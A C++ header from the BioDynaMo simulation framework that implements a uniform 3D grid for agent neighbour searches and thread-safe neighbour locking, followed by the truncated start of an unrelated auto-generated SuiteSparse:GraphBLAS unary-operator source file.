// Copyright (C) 2021 CERN & Newcastle University for the benefit of the
// BioDynaMo collaboration. All Rights Reserved.
//
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
//
// See the LICENSE file distributed with this work for details.
// See the NOTICE file distributed with this work for additional information
// regarding copyright ownership.
//
// -----------------------------------------------------------------------------
#ifndef CORE_ENVIRONMENT_UNIFORM_GRID_ENVIRONMENT_H_
#define CORE_ENVIRONMENT_UNIFORM_GRID_ENVIRONMENT_H_
#include <assert.h>
#include <omp.h>
#include <algorithm>
#include <array>
#include <atomic>
#include <cmath>
#include <iostream>
#include <limits>
#include <memory>
#include <mutex>
#ifdef LINUX
#include <parallel/algorithm>
#endif // LINUX
#include <utility>
#include <vector>
#include <morton/morton.h> // NOLINT
#include "core/container/agent_vector.h"
#include "core/container/fixed_size_vector.h"
#include "core/container/inline_vector.h"
#include "core/container/math_array.h"
#include "core/container/parallel_resize_vector.h"
#include "core/environment/environment.h"
#include "core/environment/morton_order.h"
#include "core/functor.h"
#include "core/load_balance_info.h"
#include "core/param/param.h"
#include "core/resource_manager.h"
#include "core/util/log.h"
#include "core/util/spinlock.h"
namespace bdm {
namespace detail {
struct InitializeGPUData;
} // namespace detail
/// A class that represents Cartesian 3D grid
class UniformGridEnvironment : public Environment {
// MechanicalForcesOpCuda needs access to some UniformGridEnvironment private
// members to reconstruct
// the grid on GPU (same for MechanicalForcesOpOpenCL)
friend struct MechanicalForcesOpCuda;
friend struct ::bdm::detail::InitializeGPUData;
friend struct MechanicalForcesOpOpenCL;
friend class SchedulerTest;
public:
/// A single unit cube of the grid
struct Box {
Spinlock lock_;
// std::atomic<bool> timestamp_;
uint32_t timestamp_;
/// start value of the linked list of agents inside this box.
/// Next element can be found at `successors_[start_]`
AgentHandle start_;
/// length of the linked list (i.e. number of agents)
/// uint64_t, because sizeof(Box) = 16, for uint16_t and uint64_t
uint16_t length_;
Box() : timestamp_(0), start_(AgentHandle()), length_(0) {}
/// Copy Constructor required for boxes_.resize()
/// Since box values will be overwritten afterwards it forwards to the
/// default ctor
Box(const Box& other) : Box() {}
Box& operator=(const Box& other) {
// start_ = other.start_.load(std::memory_order_relaxed);
// length_ = other.length_.load(std::memory_order_relaxed);
start_ = other.start_;
length_ = other.length_;
return *this;
}
bool IsEmpty(uint64_t grid_timestamp) const {
return grid_timestamp != timestamp_;
}
uint16_t Size(uint64_t grid_timestamp) const {
if (IsEmpty(grid_timestamp)) {
return 0;
}
return length_;
}
/// @brief Adds an agent to this box
///
/// @param[in] agent The object's identifier
/// @param AddObject successors The successors
void AddObject(AgentHandle ah, AgentVector<AgentHandle>* successors,
UniformGridEnvironment* grid) {
std::lock_guard<Spinlock> lock_guard(lock_);
if (timestamp_ != grid->timestamp_) {
timestamp_ = grid->timestamp_;
length_ = 1;
start_ = ah;
} else {
length_++;
(*successors)[ah] = start_;
start_ = ah;
}
}
/// An iterator that iterates over the cells in this box
struct Iterator {
Iterator(UniformGridEnvironment* grid, const Box* box)
: grid_(grid), current_value_(box->start_), countdown_(box->length_) {
if (grid->timestamp_ != box->timestamp_) {
countdown_ = 0;
}
}
bool IsAtEnd() { return countdown_ <= 0; }
Iterator& operator++() {
countdown_--;
if (countdown_ > 0) {
current_value_ = grid_->successors_[current_value_];
}
return *this;
}
AgentHandle operator*() const { return current_value_; }
/// Pointer to the neighbor grid; for accessing the successor_ list
UniformGridEnvironment* grid_;
/// The current agent to be considered
AgentHandle current_value_;
/// The remain number of agents to consider
int countdown_ = 0;
};
Iterator begin() const { // NOLINT
auto* grid = static_cast<UniformGridEnvironment*>(
Simulation::GetActive()->GetEnvironment());
return Iterator(grid, this);
}
};
/// An iterator that iterates over the boxes in this grid
struct NeighborIterator {
explicit NeighborIterator(
const FixedSizeVector<const Box*, 27>& neighbor_boxes,
uint64_t grid_timestamp)
: neighbor_boxes_(neighbor_boxes),
// start iterator from box 0
box_iterator_(neighbor_boxes_[0]->begin()),
grid_timestamp_(grid_timestamp) {
// if first box is empty
if (neighbor_boxes_[0]->IsEmpty(grid_timestamp)) {
ForwardToNonEmptyBox(grid_timestamp);
}
}
bool IsAtEnd() const { return is_end_; }
AgentHandle operator*() const { return *box_iterator_; }
/// Version where empty neighbor boxes are allowed
NeighborIterator& operator++() {
++box_iterator_;
// if iterator of current box has come to an end, continue with next box
if (box_iterator_.IsAtEnd()) {
return ForwardToNonEmptyBox(grid_timestamp_);
}
return *this;
}
private:
/// The 27 neighbor boxes that will be searched for agents
const FixedSizeVector<const Box*, 27>& neighbor_boxes_;
/// The box that shall be considered to iterate over for finding simulation
/// objects
typename Box::Iterator box_iterator_;
uint64_t grid_timestamp_;
/// The id of the box to be considered (i.e. value between 0 - 26)
uint16_t box_idx_ = 0;
/// Flag to indicate that all the neighbor boxes have been searched through
bool is_end_ = false;
/// Forwards the iterator to the next non empty box and returns itself
/// If there are no non empty boxes is_end_ is set to true
NeighborIterator& ForwardToNonEmptyBox(uint64_t grid_timestamp) {
// increment box id until non empty box has been found
while (++box_idx_ < neighbor_boxes_.size()) {
// box is empty or uninitialized (padding box) -> continue
if (neighbor_boxes_[box_idx_]->IsEmpty(grid_timestamp)) {
continue;
}
// a non-empty box has been found
box_iterator_ = neighbor_boxes_[box_idx_]->begin();
return *this;
}
// all remaining boxes have been empty; reached end
is_end_ = true;
return *this;
}
};
/// Enum that determines the degree of adjacency in search neighbor boxes
// todo(ahmad): currently only kHigh is supported (hardcoded 26 several
// places)
enum Adjacency {
kLow, /**< The closest 8 neighboring boxes */
kMedium, /**< The closest 18 neighboring boxes */
kHigh /**< The closest 26 neighboring boxes */
};
explicit UniformGridEnvironment(Adjacency adjacency = kHigh)
: adjacency_(adjacency), lbi_(this) {}
UniformGridEnvironment(UniformGridEnvironment const&) = delete;
void operator=(UniformGridEnvironment const&) = delete;
virtual ~UniformGridEnvironment() {}
/// Clears the grid
void Clear() override {
if (!is_custom_box_length_) {
box_length_ = 1;
}
box_length_squared_ = 1;
num_boxes_axis_ = {{0}};
num_boxes_xy_ = 0;
int32_t inf = std::numeric_limits<int32_t>::max();
grid_dimensions_ = {inf, -inf, inf, -inf, inf, -inf};
threshold_dimensions_ = {inf, -inf};
successors_.clear();
has_grown_ = false;
}
struct AssignToBoxesFunctor : public Functor<void, Agent*, AgentHandle> {
explicit AssignToBoxesFunctor(UniformGridEnvironment* grid) : grid_(grid) {}
void operator()(Agent* agent, AgentHandle ah) override {
const auto& position = agent->GetPosition();
auto idx = grid_->GetBoxIndex(position);
auto box = grid_->GetBoxPointer(idx);
box->AddObject(ah, &(grid_->successors_), grid_);
agent->SetBoxIdx(idx);
}
private:
UniformGridEnvironment* grid_ = nullptr;
};
void SetBoxLength(int32_t bl) {
box_length_ = bl;
is_custom_box_length_ = true;
}
int32_t GetBoxLength() { return box_length_; }
/// Updates the grid, as agents may have moved, added or deleted
void Update() override {
auto* rm = Simulation::GetActive()->GetResourceManager();
if (rm->GetNumAgents() != 0) {
Clear();
timestamp_++;
auto inf = Math::kInfinity;
std::array<double, 6> tmp_dim = {{inf, -inf, inf, -inf, inf, -inf}};
CalcSimDimensionsAndLargestAgent(&tmp_dim);
RoundOffGridDimensions(tmp_dim);
// If the box_length_ is not set manually, we set it to the largest agent
// size
if (!is_custom_box_length_) {
auto los = ceil(GetLargestAgentSize());
assert(
los > 0 &&
"The largest object size was found to be 0. Please check if your "
"cells are correctly initialized.");
box_length_ = los;
}
box_length_squared_ = box_length_ * box_length_;
for (int i = 0; i < 3; i++) {
int dimension_length =
grid_dimensions_[2 * i + 1] - grid_dimensions_[2 * i];
int r = dimension_length % box_length_;
// If the grid is not perfectly divisible along each dimension by the
// resolution, extend the grid so that it is
if (r != 0) {
// std::abs for the case that box_length_ > dimension_length
grid_dimensions_[2 * i + 1] += (box_length_ - r);
} else {
// Else extend the grid dimension with one row, because the outmost
// object lies exactly on the border
grid_dimensions_[2 * i + 1] += box_length_;
}
}
// Pad the grid to avoid out of bounds check when search neighbors
for (int i = 0; i < 3; i++) {
grid_dimensions_[2 * i] -= box_length_;
grid_dimensions_[2 * i + 1] += box_length_;
}
// Calculate how many boxes fit along each dimension
for (int i = 0; i < 3; i++) {
int dimension_length =
grid_dimensions_[2 * i + 1] - grid_dimensions_[2 * i];
assert((dimension_length % box_length_ == 0) &&
"The grid dimensions are not a multiple of its box length");
num_boxes_axis_[i] = dimension_length / box_length_;
}
num_boxes_xy_ = num_boxes_axis_[0] * num_boxes_axis_[1];
total_num_boxes_ = num_boxes_xy_ * num_boxes_axis_[2];
CheckGridGrowth();
// resize boxes_
if (boxes_.size() != total_num_boxes_) {
if (boxes_.capacity() < total_num_boxes_) {
boxes_.reserve(total_num_boxes_ * 2);
}
boxes_.resize(total_num_boxes_);
}
successors_.reserve();
// Assign agents to boxes
auto* param = Simulation::GetActive()->GetParam();
AssignToBoxesFunctor functor(this);
rm->ForEachAgentParallel(param->scheduling_batch_size, functor);
if (param->bound_space) {
int min = param->min_bound;
int max = param->max_bound;
threshold_dimensions_ = {min, max};
}
if (param->thread_safety_mechanism ==
Param::ThreadSafetyMechanism::kAutomatic) {
nb_mutex_builder_->Update();
}
} else {
// There are no agents in this simulation
auto* param = Simulation::GetActive()->GetParam();
bool uninitialized = boxes_.size() == 0;
if (uninitialized && param->bound_space) {
// Simulation has never had any agents
// Initialize grid dimensions with `Param::min_bound` and
// `Param::max_bound`
// This is required for the DiffusionGrid
int min = param->min_bound;
int max = param->max_bound;
grid_dimensions_ = {min, max, min, max, min, max};
threshold_dimensions_ = {min, max};
has_grown_ = true;
} else if (!uninitialized) {
// all agents have been removed in the last iteration
// grid state remains the same, but we have to set has_grown_ to false
// otherwise the DiffusionGrid will attempt to resize
has_grown_ = false;
} else {
Log::Fatal(
"UniformGridEnvironment",
"You tried to initialize an empty simulation without bound space. "
"Therefore we cannot determine the size of the simulation space. "
"Please add agents, or set Param::bound_space, "
"Param::min_bound, and Param::max_bound.");
}
}
}
/// @brief Calculates the squared euclidian distance between two points
/// in 3D
///
/// @param[in] pos1 Position of the first point
/// @param[in] pos2 Position of the second point
///
/// @return The distance between the two points
///
inline double SquaredEuclideanDistance(const Double3& pos1,
const Double3& pos2) const {
const double dx = pos2[0] - pos1[0];
const double dy = pos2[1] - pos1[1];
const double dz = pos2[2] - pos1[2];
return (dx * dx + dy * dy + dz * dz);
}
inline bool WithinSquaredEuclideanDistance(double squared_radius,
const Double3& pos1,
const Double3& pos2) const {
const double dx = pos2[0] - pos1[0];
const double dx2 = dx * dx;
if (dx2 > squared_radius) {
return false;
}
const double dy = pos2[1] - pos1[1];
const double dy2_plus_dx2 = dy * dy + dx2;
if (dy2_plus_dx2 > squared_radius) {
return false;
}
const double dz = pos2[2] - pos1[2];
const double distance = dz * dz + dy2_plus_dx2;
return distance < squared_radius;
}
LoadBalanceInfo* GetLoadBalanceInfo() override {
lbi_.Update();
return &lbi_;
}
/// @brief Applies the given lambda to each neighbor
///
/// @param[in] lambda The operation as a lambda
/// @param query The query object
void ForEachNeighbor(const std::function<void(Agent*)>& lambda,
Agent& query) const {
auto idx = query.GetBoxIdx();
FixedSizeVector<const Box*, 27> neighbor_boxes;
GetMooreBoxes(&neighbor_boxes, idx);
auto* rm = Simulation::GetActive()->GetResourceManager();
NeighborIterator ni(neighbor_boxes, timestamp_);
while (!ni.IsAtEnd()) {
auto* agent = rm->GetAgent(*ni);
if (agent != &query) {
lambda(agent);
}
++ni;
}
}
/// @brief Applies the given lambda to each neighbor of the specified
/// agent is within the squared radius (i.e. the criteria)
///
/// In simulation code do not use this function directly. Use the same
/// function from the execution context (e.g. `InPlaceExecutionContext`)
///
/// @param[in] lambda The operation as a lambda
/// @param query The query object
/// @param criteria The squared search radius (type: double*)
///
void ForEachNeighbor(Functor<void, Agent*, double>& lambda,
const Agent& query, double squared_radius) override {
if (squared_radius > box_length_squared_) {
Log::Fatal(
"UniformGridEnvironment::ForEachNeighbor",
"The requested search radius (", std::sqrt(squared_radius), ")",
" of the neighborhood search exceeds the "
"box length (",
box_length_, "). The resulting neighborhood would be incomplete.");
}
const auto& position = query.GetPosition();
auto idx = query.GetBoxIdx();
FixedSizeVector<const Box*, 27> neighbor_boxes;
GetMooreBoxes(&neighbor_boxes, idx);
auto* rm = Simulation::GetActive()->GetResourceManager();
NeighborIterator ni(neighbor_boxes, timestamp_);
const unsigned batch_size = 64;
uint64_t size = 0;
Agent* agents[batch_size] __attribute__((aligned(64)));
double x[batch_size] __attribute__((aligned(64)));
double y[batch_size] __attribute__((aligned(64)));
double z[batch_size] __attribute__((aligned(64)));
double squared_distance[batch_size] __attribute__((aligned(64)));
auto process_batch = [&]() {
#pragma omp simd
for (uint64_t i = 0; i < size; ++i) {
const double dx = x[i] - position[0];
const double dy = y[i] - position[1];
const double dz = z[i] - position[2];
squared_distance[i] = dx * dx + dy * dy + dz * dz;
}
for (uint64_t i = 0; i < size; ++i) {
lambda(agents[i], squared_distance[i]);
}
size = 0;
};
while (!ni.IsAtEnd()) {
auto ah = *ni;
// increment iterator already here to hide memory latency
++ni;
auto* agent = rm->GetAgent(ah);
if (agent != &query) {
agents[size] = agent;
const auto& pos = agent->GetPosition();
x[size] = pos[0];
y[size] = pos[1];
z[size] = pos[2];
size++;
if (size == batch_size) {
process_batch();
}
}
}
process_batch();
}
/// @brief Applies the given lambda to each neighbor or the specified
/// agent.
///
/// In simulation code do not use this function directly. Use the same
/// function from the exeuction context (e.g. `InPlaceExecutionContext`)
///
/// @param[in] lambda The operation as a lambda
/// @param query The query object
/// @param[in] squared_radius The search radius squared
///
void ForEachNeighbor(const std::function<void(Agent*)>& lambda,
const Agent& query, double squared_radius) {
const auto& position = query.GetPosition();
auto idx = query.GetBoxIdx();
FixedSizeVector<const Box*, 27> neighbor_boxes;
GetMooreBoxes(&neighbor_boxes, idx);
auto* rm = Simulation::GetActive()->GetResourceManager();
NeighborIterator ni(neighbor_boxes, timestamp_);
while (!ni.IsAtEnd()) {
// Do something with neighbor object
auto* agent = rm->GetAgent(*ni);
if (agent != &query) {
const auto& neighbor_position = agent->GetPosition();
if (this->WithinSquaredEuclideanDistance(squared_radius, position,
neighbor_position)) {
lambda(agent);
}
}
++ni;
}
}
/// @brief Return the box index in the one dimensional array of the box
/// that contains the position
///
/// @param[in] position The position of the object
///
/// @return The box index.
///
size_t GetBoxIndex(const Double3& position) const {
std::array<uint64_t, 3> box_coord;
box_coord[0] = (floor(position[0]) - grid_dimensions_[0]) / box_length_;
box_coord[1] = (floor(position[1]) - grid_dimensions_[2]) / box_length_;
box_coord[2] = (floor(position[2]) - grid_dimensions_[4]) / box_length_;
return GetBoxIndex(box_coord);
}
std::array<int32_t, 6> GetDimensions() const override {
return grid_dimensions_;
}
std::array<int32_t, 2> GetDimensionThresholds() const override {
return threshold_dimensions_;
}
void GetNumBoxesAxis(uint32_t* nba) {
nba[0] = num_boxes_axis_[0];
nba[1] = num_boxes_axis_[1];
nba[2] = num_boxes_axis_[2];
}
uint64_t GetNumBoxes() const { return boxes_.size(); }
std::array<uint64_t, 3> GetBoxCoordinates(size_t box_idx) const {
std::array<uint64_t, 3> box_coord;
box_coord[2] = box_idx / num_boxes_xy_;
auto remainder = box_idx % num_boxes_xy_;
box_coord[1] = remainder / num_boxes_axis_[0];
box_coord[0] = remainder % num_boxes_axis_[0];
return box_coord;
}
// NeighborMutex ---------------------------------------------------------
/// This class ensures thread-safety for the InPlaceExecutionContext for the
/// case
/// that an agent modifies its neighbors.
class GridNeighborMutexBuilder : public Environment::NeighborMutexBuilder {
public:
/// The NeighborMutex class is a synchronization primitive that can be
/// used to protect agents data from being simultaneously accessed by
/// multiple threads.
class GridNeighborMutex
: public Environment::NeighborMutexBuilder::NeighborMutex {
public:
GridNeighborMutex(const FixedSizeVector<uint64_t, 27>& mutex_indices,
GridNeighborMutexBuilder* mutex_builder)
: mutex_indices_(mutex_indices), mutex_builder_(mutex_builder) {
// Deadlocks occur if mutliple threads try to acquire the same locks,
// but in different order.
// -> sort to avoid deadlocks - see lock ordering
std::sort(mutex_indices_.begin(), mutex_indices_.end());
}
virtual ~GridNeighborMutex() {}
void lock() override { // NOLINT
for (auto idx : mutex_indices_) {
auto& mutex = mutex_builder_->mutexes_[idx].mutex_;
// acquire lock (and spin if another thread is holding it)
while (mutex.test_and_set(std::memory_order_acquire)) {
}
}
}
void unlock() override { // NOLINT
for (auto idx : mutex_indices_) {
auto& mutex = mutex_builder_->mutexes_[idx].mutex_;
mutex.clear(std::memory_order_release);
}
}
void SetMutexIndices(const FixedSizeVector<uint64_t, 27>& indices) {
mutex_indices_ = indices;
std::sort(mutex_indices_.begin(), mutex_indices_.end());
}
private:
FixedSizeVector<uint64_t, 27> mutex_indices_;
GridNeighborMutexBuilder* mutex_builder_;
};
/// Used to store mutexes in a vector.
/// Always creates a new mutex (even for the copy constructor)
struct MutexWrapper {
MutexWrapper() {}
MutexWrapper(const MutexWrapper&) {}
std::atomic_flag mutex_ = ATOMIC_FLAG_INIT;
};
virtual ~GridNeighborMutexBuilder() {}
void Update() {
auto* grid = static_cast<UniformGridEnvironment*>(
Simulation::GetActive()->GetEnvironment());
mutexes_.resize(grid->GetNumBoxes());
}
NeighborMutex* GetMutex(uint64_t box_idx) override;
private:
/// one mutex for each box in `UniformGridEnvironment::boxes_`
std::vector<MutexWrapper> mutexes_;
};
/// Returns the `NeighborMutexBuilder`. The client use it to create a
/// `NeighborMutex`.
NeighborMutexBuilder* GetNeighborMutexBuilder() override {
return nb_mutex_builder_.get();
}
private:
class LoadBalanceInfoUG : public LoadBalanceInfo {
public:
LoadBalanceInfoUG(UniformGridEnvironment* grid);
virtual ~LoadBalanceInfoUG();
void Update();
void CallHandleIteratorConsumer(
uint64_t start, uint64_t end,
Functor<void, Iterator<AgentHandle>*>& f) const override;
private:
UniformGridEnvironment* grid_;
MortonOrder mo_;
ParallelResizeVector<Box*> sorted_boxes_;
ParallelResizeVector<uint64_t> cummulated_agents_;
struct InitializeVectorFunctor : public Functor<void, Iterator<uint64_t>*> {
UniformGridEnvironment* grid;
uint64_t start;
ParallelResizeVector<Box*>& sorted_boxes;
ParallelResizeVector<uint64_t>& cummulated_agents;
InitializeVectorFunctor(UniformGridEnvironment* grid, uint64_t start,
decltype(sorted_boxes) sorted_boxes,
decltype(cummulated_agents) cummulated_agents);
virtual ~InitializeVectorFunctor();
void operator()(Iterator<uint64_t>* it) override;
};
void AllocateMemory();
void InitializeVectors();
};
/// The vector containing all the boxes in the grid
/// Using parallel resize vector to enable parallel initialization and thus
/// better scalability.
ParallelResizeVector<Box> boxes_;
/// is incremented at each call to Update
/// This is used to decide if boxes should be reinitialized
uint32_t timestamp_ = 0;
/// Length of a Box
int32_t box_length_ = 1;
/// Length of a Box squared
int32_t box_length_squared_ = 1;
/// True when the box length was set manually
bool is_custom_box_length_ = false;
/// Stores the number of Boxes for each axis
std::array<uint64_t, 3> num_boxes_axis_ = {{0}};
/// Number of boxes in the xy plane (=num_boxes_axis_[0] * num_boxes_axis_[1])
size_t num_boxes_xy_ = 0;
/// The total number of boxes in the uniform grid
uint64_t total_num_boxes_ = 0;
/// Implements linked list - array index = key, value: next element
///
/// // Usage
/// AgentHandle current_element = ...;
/// AgentHandle next_element = successors_[current_element];
AgentVector<AgentHandle> successors_;
/// Determines which boxes to search neighbors in (see enum Adjacency)
Adjacency adjacency_;
/// Cube which contains all agents
/// {x_min, x_max, y_min, y_max, z_min, z_max}
std::array<int32_t, 6> grid_dimensions_;
/// Stores the min / max dimension value that need to be surpassed in order
/// to trigger a diffusion grid change
std::array<int32_t, 2> threshold_dimensions_;
LoadBalanceInfoUG lbi_; //!
/// Holds instance of NeighborMutexBuilder.
/// NeighborMutexBuilder is updated if `Param::thread_safety_mechanism`
/// is set to `kAutomatic`
std::unique_ptr<GridNeighborMutexBuilder> nb_mutex_builder_ =
std::make_unique<GridNeighborMutexBuilder>();
void CheckGridGrowth() {
// Determine if the grid dimensions have changed (changed in the sense that
// the grid has grown outwards)
auto min_gd =
*std::min_element(grid_dimensions_.begin(), grid_dimensions_.end());
auto max_gd =
*std::max_element(grid_dimensions_.begin(), grid_dimensions_.end());
if (min_gd < threshold_dimensions_[0]) {
threshold_dimensions_[0] = min_gd;
has_grown_ = true;
}
if (max_gd > threshold_dimensions_[1]) {
Log::Info("UniformGridEnvironment",
"Your agents are getting near the edge of "
"the simulation space. Be aware of boundary conditions that "
"may come into play!");
threshold_dimensions_[1] = max_gd;
has_grown_ = true;
}
}
void RoundOffGridDimensions(const std::array<double, 6>& grid_dimensions) {
grid_dimensions_[0] = floor(grid_dimensions[0]);
grid_dimensions_[2] = floor(grid_dimensions[2]);
grid_dimensions_[4] = floor(grid_dimensions[4]);
grid_dimensions_[1] = ceil(grid_dimensions[1]);
grid_dimensions_[3] = ceil(grid_dimensions[3]);
grid_dimensions_[5] = ceil(grid_dimensions[5]);
}
/// @brief Gets the Moore (i.e adjacent) boxes of the query boxAlso adds
/// the
/// query box.
///
/// @param[out] neighbor_boxes The neighbor boxes
/// @param[in] box_idx The query box
///
void GetMooreBoxes(FixedSizeVector<const Box*, 27>* neighbor_boxes,
size_t box_idx) const {
neighbor_boxes->push_back(GetBoxPointer(box_idx));
// Adjacent 6 (top, down, left, right, front and back)
if (adjacency_ >= kLow) {
neighbor_boxes->push_back(GetBoxPointer(box_idx - num_boxes_xy_));
neighbor_boxes->push_back(GetBoxPointer(box_idx + num_boxes_xy_));
neighbor_boxes->push_back(GetBoxPointer(box_idx - num_boxes_axis_[0]));
neighbor_boxes->push_back(GetBoxPointer(box_idx + num_boxes_axis_[0]));
neighbor_boxes->push_back(GetBoxPointer(box_idx - 1));
neighbor_boxes->push_back(GetBoxPointer(box_idx + 1));
}
// Adjacent 12
if (adjacency_ >= kMedium) {
neighbor_boxes->push_back(
GetBoxPointer(box_idx - num_boxes_xy_ - num_boxes_axis_[0]));
neighbor_boxes->push_back(GetBoxPointer(box_idx - num_boxes_xy_ - 1));
neighbor_boxes->push_back(
GetBoxPointer(box_idx - num_boxes_axis_[0] - 1));
neighbor_boxes->push_back(
GetBoxPointer(box_idx + num_boxes_xy_ - num_boxes_axis_[0]));
neighbor_boxes->push_back(GetBoxPointer(box_idx + num_boxes_xy_ - 1));
neighbor_boxes->push_back(
GetBoxPointer(box_idx + num_boxes_axis_[0] - 1));
neighbor_boxes->push_back(
GetBoxPointer(box_idx - num_boxes_xy_ + num_boxes_axis_[0]));
neighbor_boxes->push_back(GetBoxPointer(box_idx - num_boxes_xy_ + 1));
neighbor_boxes->push_back(
GetBoxPointer(box_idx - num_boxes_axis_[0] + 1));
neighbor_boxes->push_back(
GetBoxPointer(box_idx + num_boxes_xy_ + num_boxes_axis_[0]));
neighbor_boxes->push_back(GetBoxPointer(box_idx + num_boxes_xy_ + 1));
neighbor_boxes->push_back(
GetBoxPointer(box_idx + num_boxes_axis_[0] + 1));
}
// Adjacent 8
if (adjacency_ >= kHigh) {
neighbor_boxes->push_back(
GetBoxPointer(box_idx - num_boxes_xy_ - num_boxes_axis_[0] - 1));
neighbor_boxes->push_back(
GetBoxPointer(box_idx - num_boxes_xy_ - num_boxes_axis_[0] + 1));
neighbor_boxes->push_back(
GetBoxPointer(box_idx - num_boxes_xy_ + num_boxes_axis_[0] - 1));
neighbor_boxes->push_back(
GetBoxPointer(box_idx - num_boxes_xy_ + num_boxes_axis_[0] + 1));
neighbor_boxes->push_back(
GetBoxPointer(box_idx + num_boxes_xy_ - num_boxes_axis_[0] - 1));
neighbor_boxes->push_back(
GetBoxPointer(box_idx + num_boxes_xy_ - num_boxes_axis_[0] + 1));
neighbor_boxes->push_back(
GetBoxPointer(box_idx + num_boxes_xy_ + num_boxes_axis_[0] - 1));
neighbor_boxes->push_back(
GetBoxPointer(box_idx + num_boxes_xy_ + num_boxes_axis_[0] + 1));
}
}
/// @brief Gets the box indices of all adjacent boxes. Also adds the
/// query box index.
///
/// @param[out] box_indices Result containing all box indices
/// @param[in] box_idx The query box
///
void GetMooreBoxIndices(FixedSizeVector<uint64_t, 27>* box_indices,
size_t box_idx) const {
box_indices->push_back(box_idx);
// Adjacent 6 (top, down, left, right, front and back)
if (adjacency_ >= kLow) {
box_indices->push_back(box_idx - num_boxes_xy_);
box_indices->push_back(box_idx + num_boxes_xy_);
box_indices->push_back(box_idx - num_boxes_axis_[0]);
box_indices->push_back(box_idx + num_boxes_axis_[0]);
box_indices->push_back(box_idx - 1);
box_indices->push_back(box_idx + 1);
}
// Adjacent 12
if (adjacency_ >= kMedium) {
box_indices->push_back(box_idx - num_boxes_xy_ - num_boxes_axis_[0]);
box_indices->push_back(box_idx - num_boxes_xy_ - 1);
box_indices->push_back(box_idx - num_boxes_axis_[0] - 1);
box_indices->push_back(box_idx + num_boxes_xy_ - num_boxes_axis_[0]);
box_indices->push_back(box_idx + num_boxes_xy_ - 1);
box_indices->push_back(box_idx + num_boxes_axis_[0] - 1);
box_indices->push_back(box_idx - num_boxes_xy_ + num_boxes_axis_[0]);
box_indices->push_back(box_idx - num_boxes_xy_ + 1);
box_indices->push_back(box_idx - num_boxes_axis_[0] + 1);
box_indices->push_back(box_idx + num_boxes_xy_ + num_boxes_axis_[0]);
box_indices->push_back(box_idx + num_boxes_xy_ + 1);
box_indices->push_back(box_idx + num_boxes_axis_[0] + 1);
}
// Adjacent 8
if (adjacency_ >= kHigh) {
box_indices->push_back(box_idx - num_boxes_xy_ - num_boxes_axis_[0] - 1);
box_indices->push_back(box_idx - num_boxes_xy_ - num_boxes_axis_[0] + 1);
box_indices->push_back(box_idx - num_boxes_xy_ + num_boxes_axis_[0] - 1);
box_indices->push_back(box_idx - num_boxes_xy_ + num_boxes_axis_[0] + 1);
box_indices->push_back(box_idx + num_boxes_xy_ - num_boxes_axis_[0] - 1);
box_indices->push_back(box_idx + num_boxes_xy_ - num_boxes_axis_[0] + 1);
box_indices->push_back(box_idx + num_boxes_xy_ + num_boxes_axis_[0] - 1);
box_indices->push_back(box_idx + num_boxes_xy_ + num_boxes_axis_[0] + 1);
}
}
/// Determines current box based on parameter box_idx and adds it together
/// with half of the surrounding boxes to the vector.
/// Legend: C = center, N = north, E = east, S = south, W = west, F = front,
/// B = back
/// For each box pair which is centro-symmetric only one box is taken --
/// e.g. E-W: E, or BNW-FSE: BNW
///
/// (x-axis to the right \ y-axis up)
/// z=1
/// +-----+----+-----+
/// | BNW | BN | BNE |
/// +-----+----+-----+
/// | NW | N | NE |
/// +-----+----+-----+
/// | FNW | FN | FNE |
/// +-----+----+-----+
///
/// z = 0
/// +-----+----+-----+
/// | BW | B | BE |
/// +-----+----+-----+
/// | W | C | E |
/// +-----+----+-----+
/// | FW | F | FE |
/// +-----+----+-----+
///
/// z = -1
/// +-----+----+-----+
/// | BSW | BS | BSE |
/// +-----+----+-----+
/// | SW | S | SE |
/// +-----+----+-----+
/// | FSW | FS | FSE |
/// +-----+----+-----+
///
void GetHalfMooreBoxIndices(FixedSizeVector<size_t, 14>* neighbor_boxes,
size_t box_idx) const {
// C
neighbor_boxes->push_back(box_idx);
// BW
neighbor_boxes->push_back(box_idx + num_boxes_axis_[0] - 1);
// FNW
neighbor_boxes->push_back(box_idx + num_boxes_xy_ - num_boxes_axis_[0] - 1);
// NW
neighbor_boxes->push_back(box_idx + num_boxes_xy_ - 1);
// BNW
neighbor_boxes->push_back(box_idx + num_boxes_xy_ + num_boxes_axis_[0] - 1);
// B
neighbor_boxes->push_back(box_idx + num_boxes_axis_[0]);
// FN
neighbor_boxes->push_back(box_idx + num_boxes_xy_ - num_boxes_axis_[0]);
// N
neighbor_boxes->push_back(box_idx + num_boxes_xy_);
// BN
neighbor_boxes->push_back(box_idx + num_boxes_xy_ + num_boxes_axis_[0]);
// E
neighbor_boxes->push_back(box_idx + 1);
// BE
neighbor_boxes->push_back(box_idx + num_boxes_axis_[0] + 1);
// FNE
neighbor_boxes->push_back(box_idx + num_boxes_xy_ - num_boxes_axis_[0] + 1);
// NE
neighbor_boxes->push_back(box_idx + num_boxes_xy_ + 1);
// BNE
neighbor_boxes->push_back(box_idx + num_boxes_xy_ + num_boxes_axis_[0] + 1);
}
/// @brief Gets the pointer to the box with the given index
///
/// @param[in] index The index of the box
///
/// @return The pointer to the box
///
const Box* GetBoxPointer(size_t index) const { return &(boxes_[index]); }
/// @brief Gets the pointer to the box with the given index
///
/// @param[in] index The index of the box
///
/// @return The pointer to the box
///
Box* GetBoxPointer(size_t index) { return &(boxes_[index]); }
/// Returns the box index in the one dimensional array based on box
/// coordinates in space
///
/// @param box_coord box coordinates in space (x, y, z)
///
/// @return The box index.
///
size_t GetBoxIndex(const std::array<uint64_t, 3>& box_coord) const {
return box_coord[2] * num_boxes_xy_ + box_coord[1] * num_boxes_axis_[0] +
box_coord[0];
}
};
} // namespace bdm
#endif // CORE_ENVIRONMENT_UNIFORM_GRID_ENVIRONMENT_H_
|
GB_unop__trunc_fp64_fp64.c | //------------------------------------------------------------------------------
// GB_unop: hard-coded functions for each built-in unary operator
//------------------------------------------------------------------------------
// SuiteSparse:GraphBLAS, Timothy A. Davis, (c) 2017-2021, All Rights Reserved.
// SPDX-License-Identifier: Apache-2.0
//------------------------------------------------------------------------------
// If this file is in the Generated/ folder, do not edit it (auto-generated).
#include "GB.h"
#ifndef GBCOMPACT
#include "GB_control.h"
#include "GB_atomics.h"
#include "GB_unop__include.h"
// C=unop(A) is defined by the following types and operators:
// op(A) function: GB (_unop_apply__trunc_fp64_fp64)
// op(A') function: GB (_unop_tran__trunc_fp64_fp64)
// C type: double
// A type: double
// cast: double cij = aij
// unaryop: cij = trunc (aij)
#define GB_ATYPE \
double
#define GB_CTYPE \
double
